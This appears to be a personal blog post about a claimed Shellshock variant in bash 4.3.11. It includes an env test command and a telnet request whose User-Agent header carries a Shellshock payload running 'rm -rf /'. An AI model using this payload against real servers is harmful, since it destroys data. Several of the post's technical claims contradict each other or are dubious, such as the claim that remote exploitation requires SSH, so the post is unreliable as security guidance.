Posted: . At: 5:15 PM. This was 10 years ago. Post ID: 7780
Page permalink. WordPress uses cookies, or tiny pieces of information stored on your computer, to verify who you are. There are cookies for logged in users and for commenters.
These cookies expire two weeks after they are set.

A variant of the shellshock bug that still works with the bash 4.3.11 shell.

This is a variant of the shellshock bug for bash that still works on a patched system. I am using Ubuntu 14.04 and this still works for me.

env VAR1='me() {echo "hello"}\ ' /bin/touch /home/$LOGNAME/my.text

So you can still put arbitrary content after the function definition in a bash script. I have installed the latest bash updates and this still works. So this has quite a way to go to be fully secure. Better to use another shell. I used the /bin/dash shell as a replacement for my default bash shell on Ubuntu. There is also this method using telnet that uses environment variables that can inject malicious code into a CGI script running on an Apache2 website.

telnet google.com 80                                                                                                                         [14-09-27 23:07:14]
Trying 2607:f8b0:4005:800::1007...
Trying 74.125.239.104...
Connected to google.com.
Escape character is '^]'.
HTTP/1.1 GET /
Host: google.com
User-Agent: () { :;}; rm -rf /
Accept: */*

This vulnerability must be fixed, but how do you create a regex that can check every possible permutation of malicious code inserted after a bash function. I recommend using csh or ksh instead of bash. There are no “remote” exploits for the Linux bash shell. Bash does not have network connectivity. The only way that this could be actually exploited is if the remote server has an SSH service running that is forwarded to the Internet. There may be remote code execution vulnerabilities when bash is used in connection with a network service like a web-server. CGI scripts could be vulnerable to this attack. But patching your system should be of the utmost concern when dealing with this problem. That is the best way to keep your Internet connected systems protected from attack. That and a good firewall.

1 thought on “A variant of the shellshock bug that still works with the bash 4.3.11 shell.”

Leave a Reply to John Cartwright Cancel reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.